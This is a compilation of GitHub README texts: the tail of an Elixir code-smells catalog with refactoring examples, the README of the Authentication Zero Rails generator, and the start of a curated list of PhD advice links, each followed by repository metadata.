** (KeyError) key :z not found in: %Point{x: 2, y: 3}
iex(4)> point[:x] # <= by default, struct does not support dynamic access
** (UndefinedFunctionError) ... (Point does not implement the Access behaviour)
```
These examples are based on code written by José Valim ([@josevalim][jose-valim]). Source: [link][JoseValimExamples]
[▲ back to Index](#table-of-contents)
___
### Speculative Assumptions
* __Category:__ Low-level concerns smells.
* __Note:__ Formerly known as "Unplanned value extraction".
* __Problem:__ Overall, Elixir application’s are composed of many supervised processes, so the effects of an error will be localized in a single process, not propagating to the entire application. A supervisor will detect the failing process, and restart it at that level. For this type of design to behave well, it's important that problematic code crashes when it fails to fulfill its purpose. However, some code may have undesired behavior making many assumptions we have not really planned for, such as being able to return incorrect values instead of forcing a crash. These speculative assumptions can give a false impression that the code is working correctly.
* __Example:__ The code shown below is an example of this smell. The function ``get_value/2`` tries to extract a value from a specific key of a URL query string. As it is not implemented using pattern matching, ``get_value/2`` always returns a value, regardless of the format of the URL query string passed as a parameter in the call. Sometimes the returned value will be valid; however, if a URL query string with an unexpected format is used in the call, ``get_value/2`` will extract incorrect values from it:
```elixir
defmodule Extract do
@doc """
Extract value from a key in a URL query string.
"""
def get_value(string, desired_key) do
parts = String.split(string, "&")
Enum.find_value(parts, fn pair ->
key_value = String.split(pair, "=")
Enum.at(key_value, 0) == desired_key && Enum.at(key_value, 1)
end)
end
end
#...Use examples...
# URL query string according to with the planned format - OK!
iex(1)> Extract.get_value("name=Lucas&university=UFMG&lab=ASERG", "lab")
"ASERG"
iex(2)> Extract.get_value("name=Lucas&university=UFMG&lab=ASERG", "university")
"UFMG"
# Unplanned URL query string format - Unplanned value extraction!
iex(3)> Extract.get_value("name=Lucas&university=institution=UFMG&lab=ASERG", "university")
"institution" # <= why not "institution=UFMG"? or only "UFMG"?
```
* __Refactoring:__ To remove this code smell, ``get_value/2`` can be refactored through the use of pattern matching. So, if an unexpected URL query string format is used, the function will be crash instead of returning an invalid value. This behavior, shown below, will allow clients to decide how to handle these errors and will not give a false impression that the code is working correctly when unexpected values are extracted:
```elixir
defmodule Extract do
@doc """
Extract value from a key in a URL query string.
Refactored by using pattern matching.
"""
def get_value(string, desired_key) do
parts = String.split(string, "&")
Enum.find_value(parts, fn pair ->
[key, value] = String.split(pair, "=") # <= pattern matching
key == desired_key && value
end)
end
end
#...Use examples...
# URL query string according to with the planned format - OK!
iex(1)> Extract.get_value("name=Lucas&university=UFMG&lab=ASERG", "name")
"Lucas"
# Unplanned URL query string format - Crash explaining the problem to the client!
iex(2)> Extract.get_value("name=Lucas&university=institution=UFMG&lab=ASERG", "university")
** (MatchError) no match of right hand side value: ["university", "institution", "UFMG"]
extract.ex:7: anonymous fn/2 in Extract.get_value/2 # <= left hand: [key, value] pair
iex(3)> Extract.get_value("name=Lucas&university&lab=ASERG", "university")
** (MatchError) no match of right hand side value: ["university"]
extract.ex:7: anonymous fn/2 in Extract.get_value/2 # <= left hand: [key, value] pair
```
These examples are based on code written by José Valim ([@josevalim][jose-valim]). Source: [link][JoseValimExamples]
[▲ back to Index](#table-of-contents)
___
### Modules with identical names
* __Category:__ Low-level concerns smells.
* __Problem:__ This code smell is related to possible module name conflicts that can occur when a library is implemented. Due to a limitation of the Erlang VM (BEAM), also used by Elixir, only one instance of a module can be loaded at a time. If there are name conflicts between more than one module, they will be considered the same by BEAM and only one of them will be loaded. This can cause unwanted code behavior.
* __Example:__ The code shown below is an example of this smell. Two different modules were defined with identical names (``Foo``). When BEAM tries to load both simultaneously, only the module defined in the file (``module_two.ex``) stay loaded, redefining the current version of ``Foo`` (``module_one.ex``) in memory. That makes it impossible to call ``from_module_one/0``, for example:
```elixir
defmodule Foo do
@moduledoc """
Defined in `module_one.ex` file.
"""
def from_module_one do
"Function from module one!"
end
end
```
```elixir
defmodule Foo do
@moduledoc """
Defined in `module_two.ex` file.
"""
def from_module_two do
"Function from module two!"
end
end
```
When BEAM tries to load both simultaneously, the name conflict causes only one of them to stay loaded:
```elixir
iex(1)> c("module_one.ex")
[Foo]
iex(2)> c("module_two.ex")
warning: redefining module Foo (current version defined in memory)
module_two.ex:1
[Foo]
iex(3)> Foo.from_module_two()
"Function from module two!"
iex(4)> Foo.from_module_one() # <= impossible to call due to name conflict
** (UndefinedFunctionError) function Foo.from_module_one/0 is undefined...
```
* __Refactoring:__ To remove this code smell, a library must standardize the naming of its modules, always using its own name as a prefix (namespace) for all its module's names (e.g., ``LibraryName.ModuleName``). When a module file is within subdirectories of a library, the names of the subdirectories must also be used in the module naming (e.g., ``LibraryName.SubdirectoryName.ModuleName``). In the refactored code shown below, this module naming pattern was used. For this, the ``Foo`` module, defined in the file ``module_two.ex``, was also moved to the ``utils`` subdirectory. This refactoring, in addition to eliminating the internal conflict of names within the library, will prevent the occurrence of name conflicts with client code:
```elixir
defmodule MyLibrary.Foo do
@moduledoc """
Defined in `module_one.ex` file.
Name refactored!
"""
def from_module_one do
"Function from module one!"
end
end
```
```elixir
defmodule MyLibrary.Utils.Foo do
@moduledoc """
Defined in `module_two.ex` file.
Name refactored!
"""
def from_module_two do
"Function from module two!"
end
end
```
When BEAM tries to load them simultaneously, both will stay loaded successfully:
```elixir
iex(1)> c("module_one.ex")
[MyLibrary.Foo]
iex(2)> c("module_two.ex")
[MyLibrary.Utils.Foo]
iex(3)> MyLibrary.Foo.from_module_one()
"Function from module one!"
iex(4)> MyLibrary.Utils.Foo.from_module_two()
"Function from module two!"
```
This example is based on the description provided in Elixir's official documentation. Source: [link][ModulesWithIdenticalNamesExample]
[▲ back to Index](#table-of-contents)
___
### Unnecessary macros
* __Category:__ Low-level concerns smells.
* __Problem:__ ``Macros`` are powerful meta-programming mechanisms that can be used in Elixir to extend the language. While implementing ``macros`` is not a code smell in itself, this meta-programming mechanism should only be used when absolutely necessary. Whenever a macro is implemented, and it was possible to solve the same problem using functions or other pre-existing Elixir structures, the code becomes unnecessarily more complex and less readable. Because ``macros`` are more difficult to implement and understand, their indiscriminate use can compromise the evolution of a system, reducing its maintainability.
* __Example:__ The code shown below is an example of this smell. The ``MyMath`` module implements the ``sum/2`` macro to perform the sum of two numbers received as parameters. While this code has no syntax errors and can be executed correctly to get the desired result, it is unnecessarily more complex. By implementing this functionality as a macro rather than a conventional function, the code became less clear and less objective:
```elixir
defmodule MyMath do
defmacro sum(v1, v2) do
quote do
unquote(v1) + unquote(v2)
end
end
end
#...Use examples...
iex(1)> require MyMath
MyMath
iex(2)> MyMath.sum(3, 5)
8
iex(3)> MyMath.sum(3+1, 5+6)
15
```
* __Refactoring:__ To remove this code smell, the developer must replace the unnecessary macro with structures that are simpler to write and understand, such as named functions. The code shown below is the result of the refactoring of the previous example. Basically, the ``sum/2`` macro has been transformed into a conventional named function. Note that the ``require`` command is no longer needed:
```elixir
defmodule MyMath do
def sum(v1, v2) do # <= macro became a named function!
v1 + v2
end
end
#...Use examples...
# No need to require anymore!
iex(1)> MyMath.sum(3, 5)
8
iex(2)> MyMath.sum(3+1, 5+6)
15
```
This example is based on the description provided in Elixir's official documentation. Source: [link][UnnecessaryMacroExample]
[▲ back to Index](#table-of-contents)
___
### Dynamic atom creation
* __Category:__ Low-level concerns smells.
* __Note:__ This smell emerged from a study with mining software repositories (MSR).
* __Problem:__ An ``atom`` is a basic data type of Elixir whose value is its own name. They are often useful to identify resources or to express the state of an operation. The creation of an ``atom`` do not characterize a smell by itself; however, ``atoms`` are not collected by Elixir's Garbage Collector, so values of this type live in memory while an application is executing, during its entire lifetime. Also, BEAM limit the number of ``atoms`` that can exist in an application (``1_048_576``) and each ``atom`` has a maximum size limited to 255 Unicode code points. For these reasons, the dynamic atom creation is considered a code smell, since in this way the developer has no control over how many ``atoms`` will be created during the execution of the application. This unpredictable scenario can expose an app to unexpected behavior caused by excessive memory usage, or even by reaching the maximum number of ``atoms`` possible.
* __Example:__ The code shown below is an example of this smell. Imagine that you are implementing a code that performs the conversion of ``string`` values into ``atoms`` to identify resources. These ``strings`` can come from user input or even have been received as response from requests to an API. As this is a dynamic and unpredictable scenario, it is possible for identical ``strings`` to be converted into new ``atoms`` that are repeated unnecessarily. This kind of conversion, in addition to wasting memory, can be problematic for an application if it happens too often.
```elixir
defmodule Identifier do
...
def generate(id) when is_bitstring(id) do
String.to_atom(id) #<= dynamic atom creation!!
end
end
#...Use examples...
iex(1)> string_from_user_input = "my_id"
"my_id"
iex(2)> string_from_API_response = "my_id"
"my_id"
iex(3)> Identifier.generate(string_from_user_input)
:my_id
iex(4)> Identifier.generate(string_from_API_response)
:my_id #<= atom repeated was created!
```
When we use the ``String.to_atom/1`` function to dynamically create an ``atom``, it is created regardless of whether there is already another one with the same value in memory, so when this happens automatically, we will not have control over meeting the limits established by BEAM.
* __Refactoring:__ To remove this smell, as shown below, first you must ensure that all the identifier ``atoms`` are created statically, only once, at the beginning of an application's execution:
```elixir
# statically created atoms...
_ = :my_id
_ = :my_id2
_ = :my_id3
_ = :my_id4
```
Next, you should replace the use of the ``String.to_atom/1`` function with the ``String.to_existing_atom/1`` function. This will allow string-to-atom conversions to just map the strings to atoms already in memory (statically created at the beginning of the execution), thus preventing repeated ``atoms`` from being created dynamically. This second part of the refactoring is presented below.
```elixir
defmodule Identifier do
...
def generate(id) when is_bitstring(id) do
String.to_existing_atom(id) #<= just maps a string to an existing atom!
end
end
#...Use examples...
iex(1)> Identifier.generate("my_id")
:my_id
iex(2)> Identifier.generate("my_id2")
:my_id2
iex(3)> Identifier.generate("non_existent_id")
** (ArgumentError) errors were found at the given arguments:
* 1st argument: not an already existing atom
```
Note that in the third use example, when a ``string`` different from an already existing ``atom`` is given, Elixir shows an error instead of performing the conversion. This demonstrates that this refactoring creates a more controlled and predictable scenario for the application in terms of memory usage.
This example and the refactoring are based on the Elixir's official documentation. Sources: [1][to_atom], [2][to_existing_atom]
[▲ back to Index](#table-of-contents)
## About
This catalog was proposed by Lucas Vegi and Marco Tulio Valente, from [ASERG/DCC/UFMG][ASERG].
For more info see the following paper:
* [Code Smells in Elixir: Early Results from a Grey Literature Review][preprint-copy], International Conference on Program Comprehension (ICPC), 2022. [[slides]][ICPC22-PDF] [[video]][ICPC22-YouTube] [[podcast (pt-BR) - English subtitles available]][Podcast-Spotify]
* [Understanding code smells in Elixir functional language][emse-paper], Empirical Software Engineering Journal (EMSE), 2023.
Please feel free to make pull requests and suggestions ([Issues][Issues] tab).
[▲ back to Index](#table-of-contents)
## Acknowledgments
We are supported by __[Finbits][Finbits]__<sup>TM</sup>, a Brazilian Elixir-based fintech:
<div align="center">
<a href="https://www.finbits.com.br/" alt="Click to learn more about Finbits!" title="Click to learn more about Finbits!"><img width="20%" src="https://github.com/lucasvegi/Elixir-Code-Smells/blob/main/etc/finbits.png?raw=true"></a>
<br><br>
</div>
Our research is also part of the initiative called __[Research with Elixir][ResearchWithElixir]__ (in portuguese).
[▲ back to Index](#table-of-contents)
<!-- Links -->
[Elixir Smells]: https://github.com/lucasvegi/Elixir-Code-Smells
[Elixir]: http://elixir-lang.org
[ASERG]: http://aserg.labsoft.dcc.ufmg.br/
[MultiClauseExample]: https://syamilmj.com/2021-09-01-elixir-multi-clause-anti-pattern/
[ComplexErrorHandleExample]: https://elixirforum.com/t/what-are-sort-of-smells-do-you-tend-to-find-in-elixir-code/14971
[JoseValimExamples]: http://blog.plataformatec.com.br/2014/09/writing-assertive-code-with-elixir/
[dimitarvp]: https://elixirforum.com/u/dimitarvp
[MrDoops]: https://elixirforum.com/u/MrDoops
[neenjaw]: https://exercism.org/profiles/neenjaw
[angelikatyborska]: https://exercism.org/profiles/angelikatyborska
[ExceptionsForControlFlowExamples]: https://exercism.org/tracks/elixir/concepts/try-rescue
[DataManipulationByMigrationExamples]: https://www.idopterlabs.com.br/post/criando-uma-mix-task-em-elixir
[Migration]: https://hexdocs.pm/ecto_sql/Ecto.Migration.html
[MixTask]: https://hexdocs.pm/mix/Mix.html#module-mix-task
[CodeOrganizationByProcessExample]: https://hexdocs.pm/elixir/main/library-guidelines.html#avoid-using-processes-for-code-organization
[GenServer]: https://hexdocs.pm/elixir/master/GenServer.html
[UnsupervisedProcessExample]: https://hexdocs.pm/elixir/main/library-guidelines.html#avoid-spawning-unsupervised-processes
[Supervisor]: https://hexdocs.pm/elixir/master/Supervisor.html
[Discussions]: https://github.com/lucasvegi/Elixir-Code-Smells/discussions
[Issues]: https://github.com/lucasvegi/Elixir-Code-Smells/issues
[LargeMessageExample]: https://samuelmullen.com/articles/elixir-processes-send-and-receive
[Agent]: https://hexdocs.pm/elixir/1.13/Agent.html
[Task]: https://hexdocs.pm/elixir/1.13/Task.html
[GenServer]: https://hexdocs.pm/elixir/1.13/GenServer.html
[AgentObsessionExample]: https://elixir-lang.org/getting-started/mix-otp/agent.html#agents
[ElixirInProduction]: https://elixir-companies.com/
[WorkingWithInvalidDataExample]: https://hexdocs.pm/elixir/main/library-guidelines.html#avoid-working-with-invalid-data
[ModulesWithIdenticalNamesExample]: https://hexdocs.pm/elixir/main/library-guidelines.html#avoid-defining-modules-that-are-not-in-your-namespace
[UnnecessaryMacroExample]: https://hexdocs.pm/elixir/main/library-guidelines.html#avoid-macros
[ApplicationEnvironment]: https://hexdocs.pm/elixir/1.13/Config.html
[AppConfigurationForCodeLibsExample]: https://hexdocs.pm/elixir/main/library-guidelines.html#avoid-application-configuration
[CredoWarningApplicationConfigInModuleAttribute]: https://hexdocs.pm/credo/Credo.Check.Warning.ApplicationConfigInModuleAttribute.html
[Credo]: https://hexdocs.pm/credo/overview.html
[DependencyWithUseExample]: https://hexdocs.pm/elixir/main/library-guidelines.html#avoid-use-when-an-import-is-enough
[ICPC-ERA]: https://conf.researchr.org/track/icpc-2022/icpc-2022-era
[preprint-copy]: https://doi.org/10.48550/arXiv.2203.08877
[emse-paper]: https://link.springer.com/epdf/10.1007/s10664-023-10343-6?sharing_token=-a5aIHuxjO5IVwjuWKcGDve4RwlQNchNByi7wbcMAY7M-LcfCdzMaX7W988J1lKodpMwih75AE3ZQ9gFhldJBeLq53jeNkeHR7W04UAwrxBvoXDh5P83TYkQfuz-PrYpU1J5KqxUgojIbDDFDV_jVtrEE8oVtobDqNSSrInauuI%3D
[jose-valim]: https://github.com/josevalim
[syamilmj]: https://github.com/syamilmj
[Complex-extraction-in-clauses-issue]: https://github.com/lucasvegi/Elixir-Code-Smells/issues/9
[Alternative-return-type-issue]: https://github.com/lucasvegi/Elixir-Code-Smells/issues/6
[Complex-else-clauses-in-with-issue]: https://github.com/lucasvegi/Elixir-Code-Smells/issues/7
[Large-code-generation-issue]: https://github.com/lucasvegi/Elixir-Code-Smells/issues/13
[ICPC22-PDF]: https://github.com/lucasvegi/Elixir-Code-Smells/blob/main/etc/Code-Smells-in-Elixir-ICPC22-Lucas-Vegi.pdf
[ICPC22-YouTube]: https://youtu.be/3X2gxg13tXo
[Podcast-Spotify]: http://elixiremfoco.com/episode?id=lucas-vegi-e-marco-tulio
[to_atom]: https://hexdocs.pm/elixir/String.html#to_atom/1
[to_existing_atom]: https://hexdocs.pm/elixir/String.html#to_existing_atom/1
[Finbits]: https://www.finbits.com.br/
[ResearchWithElixir]: http://pesquisecomelixir.com.br/
[TraditionalSmells]: https://github.com/lucasvegi/Elixir-Code-Smells/tree/main/traditional
| Catalog of Elixir-specific code smells | elixir-lang,code-smells,software-quality,elixir,elixir-examples | 0 | 11 | 14 | 158 | 2 | 1 | 0 |
lazaronixon/authentication-zero | # Authentication Zero
The purpose of authentication zero is to generate a pre-built authentication system into a rails application (web or api-only) that follows both security and rails best practices. By generating code into the user's application instead of using a library, the user has complete freedom to modify the authentication system so it works best with their app.
## Installation
```
$ bundle add authentication-zero
```
If you are using Rails < 7.1, you must use version 2.
```
$ bundle add authentication-zero --version "~> 2"
```
## Usage
```
$ rails generate authentication
```
## Developer responsibilities
Since Authentication Zero generates this code into your application instead of building these modules into the gem itself, you now have complete freedom to modify the authentication system, so it works best with your use case. The one caveat with using a generated authentication system is it will not be updated after it's been generated. Therefore, as improvements are made to the output of `rails generate authentication`, it becomes your responsibility to determine if these changes need to be ported into your application. Security-related and other important improvements will be explicitly and clearly marked in the `CHANGELOG.md` file and upgrade notes.
## Features
### Essential
- Sign up
- Email and password validations
- Checks if a password has been found in any data breach (--pwned)
- Authentication by cookie
- Authentication by token (--api)
- Two factor authentication + recovery codes (--two-factor)
- Two factor authentication using a hardware security key (--webauthn)
- Verify email using a link with token
- Ask password before sensitive data changes, aka: sudo (--sudoable)
- Reset the user password and send reset instructions
- Reset the user password only from verified emails
- Lock mechanism to prevent email bombing (--lockable)
- Rate limiting for your app, 1000 reqs/minute (--ratelimit)
- Send e-mail confirmation when your email has been changed
- Manage multiple sessions & devices
- Activity log (--trackable)
- Log out
### More
- Social login with omni auth (--omniauthable)
- Passwordless authentication (--passwordless)
- Send invitations (--invitable)
- "Sign-in as" button (--masqueradable)
- Multi-tentant application (--tenantable)
## Generated code
- [has_secure_password](https://api.rubyonrails.org/classes/ActiveModel/SecurePassword/ClassMethods.html#method-i-has_secure_password): Adds methods to set and authenticate against a bcrypt password.
- [authenticate_by](https://edgeapi.rubyonrails.org/classes/ActiveRecord/SecurePassword/ClassMethods.html#method-i-authenticate_by): Given a set of attributes, finds a record using the non-password attributes, and then authenticates that record using the password attributes.
- [generates_token_for](https://edgeapi.rubyonrails.org/classes/ActiveRecord/TokenFor/ClassMethods.html#method-i-generates_token_for): Defines the behavior of tokens generated for a specific purpose.
- [signed cookies](https://api.rubyonrails.org/classes/ActionDispatch/Cookies.html): Returns a jar that'll automatically generate a signed representation of cookie value and verify it when reading from the cookie again.
- [httponly cookies](https://api.rubyonrails.org/classes/ActionDispatch/Cookies.html): A cookie with the httponly attribute is inaccessible to the JavaScript, this precaution helps mitigate cross-site scripting (XSS) attacks.
- [signed_id](https://api.rubyonrails.org/classes/ActiveRecord/SignedId.html): Returns a signed id that is tamper proof, so it's safe to send in an email or otherwise share with the outside world.
- [current attributes](https://api.rubyonrails.org/classes/ActiveSupport/CurrentAttributes.html): Abstract super class that provides a thread-isolated attributes singleton, which resets automatically before and after each request.
- [action mailer](https://api.rubyonrails.org/classes/ActionMailer/Base.html): Action Mailer allows you to send email from your application using a mailer model and views.
- [log filtering](https://guides.rubyonrails.org/action_controller_overview.html#log-filtering): Parameters 'token' and 'password' are marked [FILTERED] in the log.
- [functional tests](https://guides.rubyonrails.org/testing.html#functional-tests-for-your-controllers): In Rails, testing the various actions of a controller is a form of writing functional tests.
- [system testing](https://guides.rubyonrails.org/testing.html#system-testing): System tests allow you to test user interactions with your application, running tests in either a real or a headless browser.
### Sudoable
Use `before_action :require_sudo` in controllers with sensitive information, it will ask for your password on the first access or after 30 minutes.
### Tenantable
Some artifacts are generated in the application, which makes it possible to implement row-level multitenancy applications. The `Current.account` is set using the current user account.
You should follow some steps to make it work:
- Add `account_id` to each scoped table. ex: `rails g migration add_account_to_projects account:references`.
- Add `include AccountScoped` to scoped models. It set up the account relationship and default scope using the current account.
Set `Current.account` through the URL. `http://myapp.com/:account_id`. (optional)
- Add `require_relative "../lib/account_middleware"` to `config/application.rb`.
- Add `config.middleware.use AccountMiddleware` to your application class.
- More customization is required...
## Development
To release a new version, update the version number in `version.rb`, and then run `bundle exec rake release`, which will create a git tag for the version, push git commits and tags, and push the `.gem` file to [rubygems.org](https://rubygems.org).
## Contributing
Bug reports and pull requests are welcome on GitHub at https://github.com/lazaronixon/authentication-zero. This project is intended to be a safe, welcoming space for collaboration, and contributors are expected to adhere to the [code of conduct](https://github.com/lazaronixon/authentication-zero/blob/main/CODE_OF_CONDUCT.md).
## License
The gem is available as open source under the terms of the [MIT License](https://opensource.org/licenses/MIT).
## Code of Conduct
Everyone interacting in the AuthenticationZero project's codebases, issue trackers, chat rooms and mailing lists is expected to follow the [code of conduct](https://github.com/lazaronixon/authentication-zero/blob/main/CODE_OF_CONDUCT.md).
| An authentication system generator for Rails applications. | rails,ruby,authentication,generator,rails-authentication,api,auth,security,token | 116 | 8 | 26 | 509 | 18 | 3 | 1 |
pliang279/awesome-phd-advice | # Collection of advice for prospective and current PhD students
By [Paul Liang](http://www.cs.cmu.edu/~pliang/) (pliang@cs.cmu.edu), [Machine Learning Department](http://www.ml.cmu.edu/) and [Language Technologies Institute](https://www.lti.cs.cmu.edu/), [CMU](https://www.cmu.edu/), with help from many friends at CMU. If there are any links I missed, please let me know! Credit goes out to the original authors of each link.
![](/phd030110s.gif)
## Table of Contents
* [Other similar collections](#other-similar-collections)
* [Advice for prospective students](#advice-for-prospective-students)
* [General advice](#general-advice)
* [Statement of purpose](#statement-of-purpose)
* [Visit days, choosing advisor and school](#visit-days-choosing-advisor-and-school)
* [Advice for current students](#advice-for-current-students)
* [PhD survival guides](#PhD-survival-guides)
* [Research](#research)
* [Reading](#reading)
* [Writing](#writing)
* [Blogposts](#blogposts)
* [Reviewing](#reviewing)
* [Presenting](#presenting)
* [Advising students](#advising-students)
* [Teaching](#teaching)
* [Fellowship applications](#fellowship-applications)
* [Networking](#networking)
* [Organizing workshops and tutorials](#organizing-workshops-and-tutorials)
* [Attending academic conferences](#attending-academic-conferences)
* [Job search](#job-search)
* [Memoirs](#memoirs)
## Other similar collections
[Grad School Advice by Jason Hong](http://www.cs.cmu.edu/~jasonh/advice.html)
[Advice for Research Students by Jason Eisner](https://www.cs.jhu.edu/~jason/advice/)
[Advice for researchers and students by Michael Ernst](https://homes.cs.washington.edu/~mernst/advice/)
[Advice Collection by Tao Xie and Yuan Xie](https://taoxie.cs.illinois.edu/advice.htm)
[Awesome CS PhD application advice by Jed Yang](https://jedyang.com/post/list-of-awesome-cs-phd-application-advice/)
[CS PhD the greatest hits by Angela Jiang](https://phdadvice.carrd.co/)
[List of PhD reflections by Stephen Tu](https://stephentu.github.io/blog/reflections/2016/02/28/list-phd-reflections.html)
[Thread of PhD application resources by Chaitanya Joshi](https://twitter.com/chaitjo/status/1444580607980281858?lang=en)
[Useful computer vision PhD resources by Yana Hasson](https://github.com/hassony2/useful-computer-vision-phd-resources)
[Checklists for Stat-ML PhD students by Aaditya Ramdas](https://www.stat.cmu.edu/~aramdas/checklists.html)
[Grad School Resources by Kalpesh Krishna](https://martiansideofthemoon.github.io/2018/05/29/grad-resources.html)
[AI Research Experiences by Pranav Rajpurkar](https://docs.google.com/document/d/1uvAbEhbgS_M-uDMTzmOWRlYxqCkogKRXdbKYYT98ooc/edit#)
## Advice for prospective students
### General advice
[Applying to PhD Programs in Computer Science by Mor Harchol-Balter](https://www.cs.cmu.edu/~harchol/gradschooltalk.pdf)
[Graduate School Advice by Stanford CS](https://cs.stanford.edu/degrees/phd/PhD/GraduateSchoolAdvice.pdf)
[Undergrad to PhD, or not - advice for undergrads interested in research by John Hewitt](https://nlp.stanford.edu//~johnhew//undergrad-researchers.html)
[HOWTO: Get into grad school for science, engineering, math and computer science by Matt Might](https://matt.might.net/articles/how-to-apply-and-get-in-to-graduate-school-in-science-mathematics-engineering-or-computer-science/)
[Applying for a PhD in NLP by Zhijing Jin and ACL Year-Round Mentorship Session](https://medium.com/@zhijing-jin/applying-for-a-phd-in-nlp-9d070a02cda0)
[Student Perspectives on Applying to NLP PhD Programs by Akari Asai, John Hewitt, Sidd Karamcheti, Kalpesh Krishna, Nelson Liu, Roma Patel, and Nicholas Tomlin](https://blog.nelsonliu.me/2019/10/24/student-perspectives-on-applying-to-nlp-phd-programs/)
[Machine Learning PhD Applications — Everything You Need to Know by Tim Dettmers](https://timdettmers.com/2018/11/26/phd-applications/)
[Demystifying ML PhD Admissions to US Universities by Hima Lakkaraju](https://www.youtube.com/watch?v=z6TkkdlRWcU&ab_channel=HimabinduLakkaraju)
[Demystifying PhD Admissions in Computer Science in the US: a Guide for Vietnamese and International Students by ThanhVu Nguyen](https://raw.githubusercontent.com/nguyenthanhvuh/phd-cs-us/main/demystify.pdf)
[A long, rambling, mostly personal corpus of advice on applying to Computer Science grad school (for UWCSE students) by Justine Sherry](https://people.eecs.berkeley.edu/~justine/advice.pdf)
[Ph.D. Applications: FAQ by Noah Smith](https://docs.google.com/document/d/1lT-bsIP0GKfh8l5sQnM2hCzzR9prt-QLx16rimUOdIM/edit)
[Quora answer on the admission committee process by Scott Fahlman](https://www.quora.com/What-does-the-admissions-committee-process-for-graduate-school-look-like-Do-you-sit-in-a-room-and-all-discuss-the-same-candidate-at-the-same-time-or-is-it-more-of-an-individual-process-with-opinions-aggregated-at-the-end)
[Reflecting on CS Graduate Admissions by David Anderson](https://da-data.blogspot.com/2015/03/reflecting-on-cs-graduate-admissions.html)
[A PhD is Not Enough: A Guide to Survival in Science by Peter Feibelman](https://biomath.usu.edu/files/Peter_J._Feibelman_A_PhD_Is_Not_Enough.pdf)
[The PhD in CS: Getting There and Being Successful by Michael Hilton, Janet Davis, and Ian Ludden](https://conquer.cra.org/wp-content/uploads/2021/11/ThePhDinComputing_CRAEWebinar.pdf)
### Statement of purpose
[Database of Example PhD SOPs by the CS-SOP initiative](https://cs-sop.org)
[Some Suggestions on writing your statement of purpose by Jennifer Mankoff](https://www.cc.gatech.edu/fce/people/jmankoff/gradschool/sops.html)
[Graduate School Personal Statements by Christopher Fletcher](http://cwfletcher.net/Pages/SoP.php)
[Inside PhD admissions: What readers look for in a Statement of Purpose by Nathan Schneider](https://nschneid.medium.com/inside-ph-d-admissions-what-readers-look-for-in-a-statement-of-purpose-3db4e6081f80)
[How to Write a Bad Statement by Andy Pavlo](https://www.cs.cmu.edu/~pavlo/blog/2015/10/how-to-write-a-bad-statement-for-a-computer-science-phd-admissions-application.html)
[Tips and Tricks, How-To Guide for Grad School SoPs by Erica Weng](https://t.co/J71ZD2dKJ1)
[Graduate School Statement of Purpose by MIT EECS](https://mitcommlab.mit.edu/eecs/commkit/graduate-school-personal-statement/)
[How to write personal statement for graduate school application by Stanley Chan](https://engineering.purdue.edu/ChanGroup/write_statement.html)
[Writing a Google AI Residency Cover Letter by Katherine Lee and Ben Eysenbach](https://colinraffel.com/blog/writing-a-google-ai-residency-cover-letter.html)
Public examples: [[Cody Coleman]](https://www.codycoleman.com/public/misc/Stanford-purpose.pdf), [[Sai Rallabandi]](http://www.cs.cmu.edu/~srallaba/pdfs/statement_PhD.pdf), [[Jeremy Lacomis]](https://www.cs.cmu.edu/~jlacomis/assets/statement/personal-statement-cmu.pdf), [[Sean Kross]](https://seankross.com/notes/grad-school-essays/ShortPersonalStatement.pdf), [[Zahid Hossain]](https://graphics.stanford.edu/~zhossain/grad/sop_mit.pdf), [[Jean Yang]](https://github.com/jeanqasaur/academic-application-materials/blob/master/phd-application-2007/personal_statement.pdf)
### Visit days, choosing advisor and school
[Questions to Ask a Prospective Ph.D. Advisor on Visit Day, With Thorough and Forthright Explanations by Andrew Kuznetsov](https://blog.ml.cmu.edu/2020/03/02/questions-to-ask-a-prospective-ph-d-advisor-on-visit-day-with-thorough-and-forthright-explanations/)
[How to Choose Your Grad School by Tim Dettmers](https://timdettmers.com/2022/03/13/how-to-choose-your-grad-school/)
[How to Pick a Graduate Advisor by Ben Barres](https://hst.mit.edu/sites/default/files/media/files/Barres%20BA.Neuron.80.275.2013.pdf)
[The Definitive ‘what do I ask/look for’ in a PhD Advisor Guide by Columbia CS](https://www.cs.columbia.edu/wp-content/uploads/2019/03/Get-Advisor.pdf)
## Advice for current students
### PhD survival guides
[So long, and thanks for the PhD by Ronald T. Azuma](https://www.cs.unc.edu/~azuma/hitch4.html)
[Graduate School: Keys To Success by Remzi Arpaci-Dusseau](https://www.youtube.com/watch?v=fqPSnjewkuA&ab_channel=RemziArpaci-Dusseau)
[The illustrated guide to a PhD by Matt Might](https://matt.might.net/articles/phd-school-in-pictures/)
[How to Be a Successful PhD Student by Mark Dredze, Hanna Wallach](https://people.cs.umass.edu/~wallach/how_to_be_a_successful_phd_student.pdf)
[Time Management by Randy Pausch](https://www.cs.utexas.edu/users/dahlin/bookshelf/timetalk.htm)
[Advice to a Beginning Graduate Student by Manuel Blum](https://www.cs.cmu.edu/~mblum/research/pdf/grad.html)
[Finances for CS PhD students by David Anderson](https://da-data.blogspot.com/2016/09/finances-for-cs-phd-students.html)
[A Survival Guide to a PhD by Andrej Karpathy](https://karpathy.github.io/2016/09/07/phd/)
[15 pieces of advice I wish my PhD advisor had given me by Jim Kurose](http://www-net.cs.umass.edu/kurose/talks/student_keynote_final.pdf)
[The Tao of PhD: Thriving in the Allen School’s Graduate Program by University of Washington](https://courses.cs.washington.edu/courses/cse590x/22wi/)
[10 tips for PhD students by Daniela Witten](https://imstat.org/2022/04/01/written-by-witten-so-long-and-thanks-for-all-the-tips/)
[Expectation Setting by Eugene Vinitsky](http://eugenevinitsky.github.io/posts/expectation_setting.html)
### Research
[How to Do Great Research by Nick Feamster and Alex Gray](https://greatresearch.org/)
[How to Have a Bad Career How to Have a Bad Career in Research/Academia by David Patterson](https://people.eecs.berkeley.edu/~pattrsn/talks/BadCareer.pdf)
[Useful Thoughts about Research by H.T. Kung](https://www.eecs.harvard.edu/htk/phdadvice/)
[You and Your Research by Richard Hamming](https://www.cs.virginia.edu/~robins/YouAndYourResearch.html)
[Advice on Research and Writing by Mark Leone](http://www.cs.cmu.edu/afs/cs.cmu.edu/user/mleone/web/how-to.html)
### Reading
[How to Read a Paper by Srinivasan Keshav](http://blizzard.cs.uwaterloo.ca/keshav/home/Papers/data/07/paper-reading.pdf)
[How to Read a Technical Paper by Jason Eisner](https://www.cs.jhu.edu/~jason/advice/how-to-read-a-paper.html)
### Writing
[How to write a good CVPR submission by Bill Freeman](https://billf.mit.edu/sites/default/files/documents/cvprPapers.pdf)
[Ten Simple Rules for Mathematical Writing by Dimitri Bertsekas](http://www.mit.edu/~dimitrib/Ten_Rules.html)
